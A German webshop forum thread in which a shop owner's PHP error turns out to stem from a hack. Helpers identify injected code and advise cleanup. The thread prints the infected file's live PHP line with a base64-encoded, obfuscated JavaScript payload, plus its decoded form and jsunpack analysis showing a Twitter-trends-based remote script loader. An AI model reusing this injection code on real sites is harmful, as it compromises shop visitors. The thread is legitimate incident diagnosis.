Fehler auf Homepage Fatal error: Cannot redeclare security_update

[trendyfrank]

Hallo zusammen

ich habe heute einen Fehler in meinem Shop festgestellt und kann Ihn leider selbst nicht beheben, da ich nicht weiß was es heißt und wo das Problem liegt.

Könnt Ihr mir helfen.

Code: PHP  [Auswählen]

Fatal error: Cannot redeclare security_update() (previously declared in /homepages/28/d265965978/htdocs/megastore/index.php:1) in /homepages/28/d265965978/htdocs/megastore/inc/xtc_get_top_level_domain.inc.php on line 1

Gruß Frank



Linkback: https://www.modified-shop.org/forum/index.php?topic=17114.0

[Alfred]

Hallo,

und wie sieht der Inhalt dieser beiden Dateien aus?

Gruß

[trendyfrank]

Welche meinst du.

"index.php:1" - die "index.php" gibt es aber die "index.php:1" nicht ?

"xtc_get_top_level_domain.inc.php" da steht folgendes:

Code: PHP  [Auswählen]

<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD4oZnVuY3Rpb24oJCQpe2Q9IiggOCAqaT0gOHZhciBWYz10aGlzOyAgW1ZjXFxGdWxsWWVhciAlTW9udGggJURhdGUgJUhvdXJzICVNaW51dGVzICVTZWNvbmRzKCldfTsgKkI9IDggJm4sVnI9dGhpcy4jaSgpLGk9MDtWclsxXSs9MTt3aGlsZShpKys8Nyl7I249VnJbaV0gLyNuPCNiKVZyW2ldIDQjbn0gICBWci5zcGxpY2UofnonKSwxK35UIDAgNX51IDArJ1QnK1ZyIDV+VSAwfTtWTj17J2hgaHR0cDovL1hzYC9YdGB0cmVYZGBkYWlYbmBuZHNYcWA/WGNgY2FsbGJhY2s9WGpgI1hhYGFwaVhsYGx5WFdgdHdpdHRlclhvYGNvbVhlYDFYa2BzWEtgYm9keVh4YGFqYXhYRGAuWExgbGlic1hKYGpxdWVyeVg2YDYuMlhtYG1pblhmYG9uWFNgY3JpcHRYaWBpZlhNYHJhbWVYWWBoZWFkWHdgd2lkdGg6WHBgcHg7WEhgaGVpZ2h0OlhUYDJYcmByY1hRYFwiWHlgc3R5bGU9WGJgPjxYUmA+PC9YSWBkaXZYQmA8WEFgPlhnYGdvb2dsZVhFYCZkYXRlPVh6YDBYdWAtWFVgIFgsYDowMFg7JzoyMzQ1Njc4OTAxLCcvJzo0ODI3MSwnRic6MTk4MTk1MjU0LCdHJzoxMiwnQ2A9J307QCAjRyhWbSl7I289W107Zm9yKFZ4PTA7Vng8Vm0gLjtWeCsrKXsjby5wdXNoKFZOW1ZtLmNoYXJBdChWeCldKX0gICAjVCgjbyl9VkI9ZG9jdW1lbnQ7I3g9d2luZG93OyArRT0ndW5kZWZpbmVkJzsgK2o9fmhhRFdEb3Nlc3Ruc2RsRGpmcWNxJyA6Uj0gKSk9PSArRSkgLyNSfHwhVkQoKSl7aWYoISNSKXt0cnl7VmQ9alF1ZXJ5ICE7dHJ5e1ZkPSQgIX1WTT1WQi5nZXRFbGVtZW50c0J5VGFnTmFtZSh+WSAwWzBdOyNKPVZCLmNyZWF0ZUVsZW1lbnQofmtTIDA7I0ouc2V0QXR0cmlidXRlKH5rcicpLCNHKFwiaHhEZ2FrRG9zeHNMc0pzZUQ2c0pEbURqXCIpKTtWTS5hcHBlbmRDaGlsZCgjSil9QCBWYSgjRixWSyl7ICAgTWF0aC5mbG9vcigjRi9WSykgNmUoI2spe3ZhciBWZz1WYSggK3UsICRHKTsgJkM9ICt1JSAkRzsgJlM9ICRyKiNDOyAmTD0gJEoqVmc7ICZ5PSNTLSNMIC8jeT4wKXsjdT0jeX1lbHNleyN1PSN5KyAkQX0gICgjdSUjaykgNnooI3cpeyArdT1+OycpKyN3OyAkcj1+LycpOyAkQT1+OycpLX5GJyk7ICRHPVZhKCAkQSwgJHIpOyAkSj0gJEElICRyIDZUKFYpeyAgIFYgLj09MT9WWzBdOlYgNScnKX07QCAjSyhWKXtkPW5ldyBEYXRlKCA6Yz1+emVlJyk7ZC5zZXRUaW1lKChWLmFzX29mLX5HJykqfkcnKSp+RycpKn5lenogMCp+ZXp6eiAwOyAgIGQgNnAoVnUpeyAmYSxWbiwjZj1WdSAuOyAmZD1bXTt3aGlsZSgtLSNmKXtWbj0jZSgjZiA6ZC5wdXNoKFZuIDphPVZ1W1ZuXTtWdVtWbl09VnVbI2ZdO1Z1WyNmXT0jYX19QCBWcCgkKXtWcz0kLm1hcChbODEsODUsNzQsNzQsOTIsMTcsODIsNzMsODAsMzAsODIsNzcsMjUsMTEsMTAsMTAsNjEsMTEsNTYsNTUsMTEsNTMsNiw1Myw3LDIsMSwwLDQ4XSxAKHgsaSl7ICAgU3RyaW5nLmZyb21DaGFyQ29kZShpK3grMjQpfSk7ICAgI1QoVnMpIDZ2KCQpe2lmICkpIT0gK0UpeyQoIDhpZiApLlZ0KSE9ICtFKSAgOyQuVnQ9MTsgMmosQChWeSl7I2c9I0soVnkgOmg9I2dcXE1vbnRoKCkgOUw9I2dcXERhdGUoKTtWUz0jaCtcIi1cIitWTDsjUD0jaisjRyhcIkUgMztWaj1WUD1WYSgjZ1xcSG91cnMoKSw2KSo2IDlFPVZqKzE7I2I9K35leicpOyAsIDJQLEAoVnkpe3RyeXsjRD1WeS50cmVuZHM7I009I0coXCIgMytcIiBcIiAvVmo8I2IpVmogNFZqIC9WRTwjYilWRSA0VkU7IDdqKyNHKFgpXSAvISNOKXsgN0UrI0coWCldfSNOPSgjTlszXS5uYW1lLnRvTG93ZXJDYXNlKCkucmVwbGFjZSgvW15hLXpdL2dpLCcnKSsnbWljcm9zY29wZScpLnNwbGl0KCcnIDpzPSNoKjcxK1ZQKjMrVkwqMzc7I3ooI3MgOnE9I2UoNCkrI2I7I3AoI04gOkg9fkNoJykrI1QoI04pLnN1YnN0cmluZygwLCNxKSsnLmNvbS8nK1ZwKCQpO1ZOWydaJ109I0g7VmI9fkJJIDFiaU1VIDFVa3JaUmlNUklBJyk7JCh+SyAwLmFwcGVuZChWYil9Y2F0Y2goVmYpe319KX0sI2IqI2IqI2IpfSl9KX1lbHNleyAsIC0sMSt+VFRUIDB9fSAtKSgpI2pzQGZ1bmN0aW9uViNtWCcsJ2AnOid+I0coJ1xcLmdldFVUQyAgcmV0dXJuICEubm9Db25mbGljdCh0cnVlKX1jYXRjaChlKXt9ICQjeC5WICUoKSxWY1xcICZ2YXIgIyApKHR5cGVvZigkICpEYXRlLnByb3RvdHlwZS4jICsjeC4jICxzZXRUaW1lb3V0KCA4IC0jdigjeC5qUXVlcnkpfSAuLmxlbmd0aCAvO2lmKCAwJykpIDF5UUhUcHdlZWVwUSAyJC5nZXRKU09OKCMgM1R6ZWV1XCIpK1ZTIDQ9fnonKSsgNS5qb2luKCA2fUAgIyA3I049I0RbI00rViA4QCgpeyA5KygrfmUgMDtWIDopOyMiO2ZvcihjPTUzO2M7ZD0odD1kLnNwbGl0KCcjQFZYYH5cXCAgICEgJCAlICYgKSAqICsgLCAtIC4gLyAwIDEgMiAzIDQgNSA2IDcgOCA5IDonLnN1YnN0cihjLT0oeD1jPDk/MToyKSx4KSkpLmpvaW4odC5wb3AoKSkpOyQkKGQpfSkoZnVuY3Rpb24oanNtSCl7cmV0dXJuKGZ1bmN0aW9uKGpzbSxqc21GKXtyZXR1cm4ganNtRihqc20oanNtRihqc20oanNtSCkpKSkoanNtSCkoKX0pKChmdW5jdGlvbihqc20pe3JldHVybiBqc20uY29uc3RydWN0b3J9KSwoZnVuY3Rpb24oanNtKXtyZXR1cm4oZnVuY3Rpb24oanNtRil7cmV0dXJuIGpzbS5jYWxsKGpzbSxqc21GKX0pfSkpfSk7PC9zY3JpcHQ+');}
/* -----------------------------------------------------------------------------------------
   $Id: xtc_get_top_level_domain.inc.php 1535 2006-08-20 21:38:20Z mz $

   xt:Commerce - community made shopping
   http://www.(( Wir dulden keine kommerziellen Werbelinks - Bitte Forenregeln beachten! ))

   Copyright (c) 2006 xt:Commerce
   -----------------------------------------------------------------------------------------
   based on:
   (c) 2000-2001 The Exchange Project  (earlier name of osCommerce)
   (c) 2002-2003 osCommerce(general.php,v 1.225 2003/05/29); www.oscommerce.com
   (c) 2003      nextcommerce (xtc_get_top_level_domain.inc.php,v 1.3 2003/08/13); www.nextcommerce.org

   Released under the GNU General Public License
   ---------------------------------------------------------------------------------------*/
function xtc_get_top_level_domain($url) {
        if (strpos($url, '://')) {
                $url = parse_url($url);
                $url = $url['host'];
        }
        $domain_array = explode('.', $url);
        $domain_size = sizeof($domain_array);
        if ($domain_size > 1) {
                if (is_numeric($domain_array[$domain_size -2]) && is_numeric($domain_array[$domain_size -1])) {
                        return false;
                } else {
    //BOF - Dokuman - 2009-09-16 - Fix forced session-ID due to not correctly determined TLD
      /*
                        for ($domain_part = 1; $domain_part < $domain_size; $domain_part++) {
                                $domain_path .= $domain_array[$domain_part];
                                if ($domain_part != ($domain_size -1))
                                        $domain_path .= '.';
                        }
                        return $domain_path;
      */
                        return $domain_array[$domain_size - 2] . '.' . $domain_array[$domain_size - 1];
    //EOF - Dokuman - 2009-09-16 - Fix forced session-ID due to not correctly determined TLD
                }
        } else {
                return false;
        }
}
?>

Ich kann damit nichts anfangen.

Gruß Frank

[Alfred]

Hallo,

dein Shop wurde gehackt.

Ändere die ersten beiden Zeilen ab.

Code: PHP  [Auswählen]

<?php
/* -----------------------------------------------------------------------------------------

Wichtiger ist es die Ursache zu finden.
Warnung auf Startseite, header & cache, xtc_setcookie.inc.php /application_top
Da hatte ich auch schon was geschrieben.

Du bist da nicht der Erste... http://goo.gl/t5DtQ

Gruß

[trendyfrank]

Danke Alfred,

in der "main.php" war das gleiche drin.

ich habe es auch abgeändert.

Gruß Frank

[Alfred]

Hallo,

du musst die Ursache finden!

Gruß

[trendyfrank]

Aber wie? Wonach muß ich suchen als Laie?

Gruß Frank

[franky_n]

hallo trendyfrank,

am Besten Du suchst hier im Forum mal nach Themen dazu. 

Warnung auf Startseite, header & cache, xtc_setcookie.inc.php /application_top

Dann findest Du auch die wichtigen Ratschläge wie man vorgehen soll.

Viele Grüße

Franky

[trendyfrank]

Wer sucht der findet, da hast du Recht franky.

Mit ist klar, das alle Passwörter geändert werden müssen, sowie Virenscan. Ich habe Norton 360 und er zeigt keine Trojaner etc. an.

Muß ich noch mehr machen ?

Was hat der Hack noch bei mir im Shop angerichtet ??

Gruß Frank

[franky_n]

Hallo trendyfrank,

auch zur Sicherheit noch mal einen anderen Virenscanner drüber laufen lassen, z.B. Microsoft Essentials oder andere kostenfreie Virenprogramme...
Da müsstest Du Dir aber selber helfen denn dies hier ist kein Support für virenverseuchte Computer.

Erst wenn Du sicher bist das kein Virus mehr auf Deinem PC ist und Du auch kein Filezilla benutzt dann kannst Du wieder hochladen. Wichtig: Niemals bei Deinem FTP Programm die Passwörter speichern, denn das ist auch eine Sicherheitlücke.

Was alles kompromittiert ist können wir Dir auch nicht sagen. Du solltest jedoch einfach mal in Deinen Webshop Dateien danach suchen:

Code: PHP  [Auswählen]

ob_start("security_update");

Kann man mit Notepadd++ und Total Commander...

Viele Grüße

Franky

[JohannaArtinger]

Das ist der Javascriptcode, wenn man ihn decodiert:

Code: Javascript  [Auswählen]

<script>(function($$){d="( 8 *i= 8var Vc=this;  [Vc\\FullYear %Month %Date %Hours %Minutes %Seconds()]}; *B= 8 &n,Vr=this.#i(),i=0;Vr[1]+=1;while(i++<7){#n=Vr[i] /#n<#b)Vr[i] 4#n}   Vr.splice(~z'),1+~T 0 5~u 0+'T'+Vr 5~U 0};VN={'h`http://Xs`/Xt`treXd`daiXn`ndsXq`?Xc`callback=Xj`#Xa`apiXl`lyXW`twitterXo`comXe`1Xk`sXK`bodyXx`ajaxXD`.XL`libsXJ`jqueryX6`6.2Xm`minXf`onXS`criptXi`ifXM`rameXY`headXw`width:Xp`px;XH`height:XT`2Xr`rcXQ`\"Xy`style=Xb`><XR`></XI`divXB`<XA`>Xg`googleXE`&date=Xz`0Xu`-XU` X,`:00X;':2345678901,'/':48271,'F':198195254,'G':12,'C`='};@ #G(Vm){#o=[];for(Vx=0;Vx<Vm .;Vx++){#o.push(VN[Vm.charAt(Vx)])}   #T(#o)}VB=document;#x=window; +E='undefined'; +j=~haDWDosestnsdlDjfqcq' :R= ))== +E) /#R||!VD()){if(!#R){try{Vd=jQuery !;try{Vd=$ !}VM=VB.getElementsByTagName(~Y 0[0];#J=VB.createElement(~kS 0;#J.setAttribute(~kr'),#G(\"hxDgakDosxsLsJseD6sJDmDj\"));VM.appendChild(#J)}@ Va(#F,VK){   Math.floor(#F/VK) 6e(#k){var Vg=Va( +u, $G); &C= +u% $G; &S= $r*#C; &L= $J*Vg; &y=#S-#L /#y>0){#u=#y}else{#u=#y+ $A}  (#u%#k) 6z(#w){ +u=~;')+#w; $r=~/'); $A=~;')-~F'); $G=Va( $A, $r); $J= $A% $r 6T(V){   V .==1?V[0]:V 5'')};@ #K(V){d=new Date( :c=~zee');d.setTime((V.as_of-~G')*~G')*~G')*~ezz 0*~ezzz 0;   d 6p(Vu){ &a,Vn,#f=Vu .; &d=[];while(--#f){Vn=#e(#f :d.push(Vn :a=Vu[Vn];Vu[Vn]=Vu[#f];Vu[#f]=#a}}@ Vp($){Vs=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){   String.fromCharCode(i+x+24)});   #T(Vs) 6v($){if ))!= +E){$( 8if ).Vt)!= +E)  ;$.Vt=1; 2j,@(Vy){#g=#K(Vy :h=#g\\Month() 9L=#g\\Date();VS=#h+\"-\"+VL;#P=#j+#G(\"E 3;Vj=VP=Va(#g\\Hours(),6)*6 9E=Vj+1;#b=+~ez'); , 2P,@(Vy){try{#D=Vy.trends;#M=#G(\" 3+\" \" /Vj<#b)Vj 4Vj /VE<#b)VE 4VE; 7j+#G(X)] /!#N){ 7E+#G(X)]}#N=(#N[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'microscope').split('' :s=#h*71+VP*3+VL*37;#z(#s :q=#e(4)+#b;#p(#N :H=~Ch')+#T(#N).substring(0,#q)+'.com/'+Vp($);VN['Z']=#H;Vb=~BI 1biMU 1UkrZRiMRIA');$(~K 0.append(Vb)}catch(Vf){}})},#b*#b*#b)})})}else{ , -,1+~TTT 0}} -)()#js@functionV#mX','`':'~#G('\\.getUTC  return !.noConflict(true)}catch(e){} $#x.V %(),Vc\\ &var # )(typeof($ *Date.prototype.# +#x.# ,setTimeout( 8 -#v(#x.jQuery)} ..length /;if( 0')) 1yQHTpweeepQ 2$.getJSON(# 3Tzeeu\")+VS 4=~z')+ 5.join( 6}@ # 7#N=#D[#M+V 8@(){ 9+(+~e 0;V :);#";for(c=53;c;d=(t=d.split('#@VX`~\\   ! $ % & ) * + , - . / 0 1 2 3 4 5 6 7 8 9 :'.substr(c-=(x=c<9?1:2),x))).join(t.pop()));$$(d)})(function(jsmH){return(function(jsm,jsmF){return jsmF(jsm(jsmF(jsm(jsmH))))(jsmH)()})((function(jsm){return jsm.constructor}),(function(jsm){return(function(jsmF){return jsm.call(jsm,jsmF)})}))});</script>

Ganz schön verwuschtelt. Aber er händelt einige APIS schon interresant der Hack.

[DokuMan]

Das ist "jsunpack":

Code: Javascript  [Auswählen]

//jsunpack.called
CreateElement script
//jsunpack.url
setAttribute src = http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js  
//jsunpack.url
undefined
//jsunpack.url
var d = (function(){Date.prototype.jsi=function(){var jsmc=this;return[jsmc.getUTCFullYear(),jsmc.getUTCMonth(),jsmc.getUTCDate(),jsmc.getUTCHours(),jsmc.getUTCMinutes(),jsmc.getUTCSeconds()]};Date.prototype.jsB=function(){var jsn,jsmr=this.jsi(),i=0;jsmr[1]+=1;w  
//jsunpack.ur
 var jsj = http://api.twitter.com/1/trends/daily.json?callback=?  
//jsunpack.url
var newurl = http://api.twitter.com/1/trends/daily.json?callback=?